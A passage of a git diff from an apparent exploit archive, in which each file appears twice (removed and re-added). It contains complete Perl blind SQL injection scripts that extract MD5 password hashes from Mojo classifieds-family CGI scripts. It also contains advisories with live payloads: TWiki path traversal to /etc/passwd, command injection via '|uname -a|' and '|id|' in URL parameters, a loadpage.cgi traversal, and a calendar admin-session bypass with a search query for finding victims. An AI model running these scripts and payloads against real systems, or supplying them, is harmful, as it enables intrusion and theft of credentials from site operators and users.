and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoClassifieds Blind SQL Injection Exploit #\n"; + print " # (mojoClassified.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat_a value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat_a = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat_a = shift; + my $i = shift; + 
my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6109.pl b/platforms/cgi/webapps/6109.pl index 7f9ad3d42..535f43ea9 100755 --- a/platforms/cgi/webapps/6109.pl +++ b/platforms/cgi/webapps/6109.pl 
@@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoPersonals Blind SQL Injection Exploit #\n"; - print " # (mojoClassified.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat=".$cat." 
and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoPersonals Blind SQL Injection Exploit #\n"; + print " # (mojoClassified.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat = shift; + my $i = shift; + my $h = 
shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat=".$cat." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6110.pl b/platforms/cgi/webapps/6110.pl index 35d1a3746..c7ec1ea03 100755 --- a/platforms/cgi/webapps/6110.pl +++ b/platforms/cgi/webapps/6110.pl 
@@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoJobs Blind SQL Injection Exploit #\n"; - print " # (mojoJobs.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat_a value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat_a = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat_a = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoJobs.cgi?mojo=1&cat_a=".$cat_a." 
and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoJobs Blind SQL Injection Exploit #\n"; + print " # (mojoJobs.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat_a value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat_a = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat_a = shift; + my $i = shift; + my $h = 
shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoJobs.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6111.pl b/platforms/cgi/webapps/6111.pl index 849436bc0..6470fbd04 100755 --- a/platforms/cgi/webapps/6111.pl +++ b/platforms/cgi/webapps/6111.pl 
@@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoAuto Blind SQL Injection Exploit #\n"; - print " # (mojoAuto.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat_a value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat_a = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat_a = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." 
and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoAuto Blind SQL Injection Exploit #\n"; + print " # (mojoAuto.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat_a value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat_a = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat_a = shift; + my $i = shift; + my $h = 
shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6269.txt b/platforms/cgi/webapps/6269.txt index 3dccb1dd8..37c6ac9da 100755 --- a/platforms/cgi/webapps/6269.txt +++ b/platforms/cgi/webapps/6269.txt 
@@ -1,61 +1,61 @@ -################################################################################################################ -# # -# TWiki 4.2.0 File Disclosure Vuln (configure) # -# # -################################################################################################################ - - "We're brazilian newbies!!! :p" - Th1nk3r - -Info ----------------------------------------------------------------------------------------------------------------- -Classe : Input Validation Error -Remote : Yes -Local : No -Date : 05/08/2008 -Credits : Th1nk3r (cnwfhguohrugbo / gmail.com) -Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick. - -Description ----------------------------------------------------------------------------------------------------------------- - TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible -to exploit the bug if you can access the "/bin/configure" script. -Otherwise, you can not exploit this bug. - Vulnerable code of "/bin/configure" script: - - if( $action eq 'image' ) { - # SMELL: this call is correct, but causes a perl error - # on some versions of CGI.pm - # print $query->header(-type => $query->param('type')); - # So use this instead: - print 'Content-type: '.$query->param('type')."\n\n"; - if( open(F, 'logos/'.$query->param('image' ))) { - local $/ = undef; - print ; - close(F); - } - exit 0; -} - - The bug is in the open() function. The file is set by visitor, and there is no protection added -by the programmer. - Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain". - - - -Exploit ----------------------------------------------------------------------------------------------------------------- - - To exploit the bug, you just need set the "image" variable to the path of file you wish to view. - The file will be revealed if you have permission to view it. 
- - By example, to show the "/etc/passwd" file content, go to : - http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain - - - -Solution ----------------------------------------------------------------------------------------------------------------- - Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for -more information of how to protect your "configure" script. - -# milw0rm.com [2008-08-19] +################################################################################################################ +# # +# TWiki 4.2.0 File Disclosure Vuln (configure) # +# # +################################################################################################################ + + "We're brazilian newbies!!! :p" - Th1nk3r + +Info +---------------------------------------------------------------------------------------------------------------- +Classe : Input Validation Error +Remote : Yes +Local : No +Date : 05/08/2008 +Credits : Th1nk3r (cnwfhguohrugbo / gmail.com) +Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick. + +Description +---------------------------------------------------------------------------------------------------------------- + TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible +to exploit the bug if you can access the "/bin/configure" script. +Otherwise, you can not exploit this bug. + Vulnerable code of "/bin/configure" script: + + if( $action eq 'image' ) { + # SMELL: this call is correct, but causes a perl error + # on some versions of CGI.pm + # print $query->header(-type => $query->param('type')); + # So use this instead: + print 'Content-type: '.$query->param('type')."\n\n"; + if( open(F, 'logos/'.$query->param('image' ))) { + local $/ = undef; + print ; + close(F); + } + exit 0; +} + + The bug is in the open() function. 
The file is set by visitor, and there is no protection added +by the programmer. + Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain". + + + +Exploit +---------------------------------------------------------------------------------------------------------------- + + To exploit the bug, you just need set the "image" variable to the path of file you wish to view. + The file will be revealed if you have permission to view it. + + By example, to show the "/etc/passwd" file content, go to : + http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain + + + +Solution +---------------------------------------------------------------------------------------------------------------- + Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for +more information of how to protect your "configure" script. + +# milw0rm.com [2008-08-19] diff --git a/platforms/cgi/webapps/642.pl b/platforms/cgi/webapps/642.pl index 5185ec439..2b54e5187 100755 --- a/platforms/cgi/webapps/642.pl +++ b/platforms/cgi/webapps/642.pl @@ -224,6 +224,6 @@ print "[Server issued an empty response. Perhaps you entered a wrong command?]\n } else { die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n"; } -} - -# milw0rm.com [2004-11-20] +} + +# milw0rm.com [2004-11-20] diff --git a/platforms/cgi/webapps/6509.txt b/platforms/cgi/webapps/6509.txt index d3d109100..1af3eac5f 100755 --- a/platforms/cgi/webapps/6509.txt +++ b/platforms/cgi/webapps/6509.txt 
@@ -1,33 +1,33 @@ -#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------# -#-----------TWiki Remote Code Execution <= 4.2.2--------------------# - -# ----------developers site: http://www.twiki.org-------------------# -# ----------CVE Id(s) : CVE-2008-3195--------------------------# - -# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights - -The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion. - -According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;) - -Vulnerable code: - -if( $action eq 'image' ) { - # SMELL: this call is correct, but causes a perl error - - # on some versions of CGI.pm - # print $query->header(-type => $query->param('type')); - # So use this instead: - print 'Content-type: '.$query->param('type')."\n\n"; - - if( open(F, 'logos/'.$query->param('image' ))) { - local $/ = undef; - print ; - close(F); - } - -http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain - -http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain - -# milw0rm.com [2008-09-21] +#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------# +#-----------TWiki Remote Code Execution <= 4.2.2--------------------# + +# ----------developers site: http://www.twiki.org-------------------# +# ----------CVE Id(s) : CVE-2008-3195--------------------------# + +# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights + +The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion. 
+ +According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;) + +Vulnerable code: + +if( $action eq 'image' ) { + # SMELL: this call is correct, but causes a perl error + + # on some versions of CGI.pm + # print $query->header(-type => $query->param('type')); + # So use this instead: + print 'Content-type: '.$query->param('type')."\n\n"; + + if( open(F, 'logos/'.$query->param('image' ))) { + local $/ = undef; + print ; + close(F); + } + +http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain + +http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain + +# milw0rm.com [2008-09-21] diff --git a/platforms/cgi/webapps/659.txt b/platforms/cgi/webapps/659.txt index 1d5702439..528b3e504 100755 --- a/platforms/cgi/webapps/659.txt +++ b/platforms/cgi/webapps/659.txt @@ -1,5 +1,5 @@ Example: -http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html - -# milw0rm.com [2004-11-25] +http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html + +# milw0rm.com [2004-11-25] diff --git a/platforms/cgi/webapps/6771.txt b/platforms/cgi/webapps/6771.txt index dc2eef975..9ecc71663 100755 --- a/platforms/cgi/webapps/6771.txt +++ b/platforms/cgi/webapps/6771.txt 
@@ -1,43 +1,43 @@ -******************************************************* -*Exploit discovered by SecVuln from http://secvuln.com* -*Come join our clan! * -*contact secvuln@secvuln.com * -******************************************************* - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Author == SecVuln -Version == 4.02 -Software == Calendars for the web by great hill corporation -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Calendars for the web has a vulnerability in the administration page. -The page saves the past session, so that anyone navigating to the page has -admin access. - -Exploit: - -Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe - -After attack: -target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 - -Example: -target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 - -!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -how to fix: set time out for login to five minutes ! -!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! - -A Google query can find a couple pages of victims: inurl:calweb/calweb.exe - -Further hacks: if they disable the timeout you can still log in right after -they log out... You could probaly do something with that -Also the 0 at the ending is the administrator (super user) id. - -///////////////////////////////////////////////////////////////// -I take no responsability for the misuse of the information.////// -Author will not be held liable for any damages ////// -COME CHECK MY SITE OUT WWW.SECVULN.COM ////// -//////////////////////////////////////////////////////////////// - -# milw0rm.com [2008-10-16] +******************************************************* +*Exploit discovered by SecVuln from http://secvuln.com* +*Come join our clan! 
* +*contact secvuln@secvuln.com * +******************************************************* + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Author == SecVuln +Version == 4.02 +Software == Calendars for the web by great hill corporation +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Calendars for the web has a vulnerability in the administration page. +The page saves the past session, so that anyone navigating to the page has +admin access. + +Exploit: + +Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe + +After attack: +target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 + +Example: +target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 + +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +how to fix: set time out for login to five minutes ! +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + +A Google query can find a couple pages of victims: inurl:calweb/calweb.exe + +Further hacks: if they disable the timeout you can still log in right after +they log out... You could probaly do something with that +Also the 0 at the ending is the administrator (super user) id. + +///////////////////////////////////////////////////////////////// +I take no responsability for the misuse of the information.////// +Author will not be held liable for any damages ////// +COME CHECK MY SITE OUT WWW.SECVULN.COM ////// +//////////////////////////////////////////////////////////////// + +# milw0rm.com [2008-10-16] diff --git a/platforms/cgi/webapps/6845.txt b/platforms/cgi/webapps/6845.txt index bd965809d..b497cca43 100755 --- a/platforms/cgi/webapps/6845.txt +++ b/platforms/cgi/webapps/6845.txt 
@@ -1,13 +1,13 @@ -<~\Adspro Script Remote Command Execution/~> - -[~]Author S0l1D -[~]Script Adspro -[~]Homepage http://adspro.mhfmedia.com/index.shtm - -** -~\Exploit/~ - -http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_top.htm|id| -http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_login.htm|id| - -# milw0rm.com [2008-10-26] +<~\Adspro Script Remote Command Execution/~> + +[~]Author S0l1D +[~]Script Adspro +[~]Homepage http://adspro.mhfmedia.com/index.shtm + +** +~\Exploit/~ + +http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_top.htm|id| +http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_login.htm|id| + +# milw0rm.com [2008-10-26] diff --git a/platforms/cgi/webapps/6864.txt b/platforms/cgi/webapps/6864.txt index 52fa54923..a39ea6740 100755 --- a/platforms/cgi/webapps/6864.txt +++ b/platforms/cgi/webapps/6864.txt 
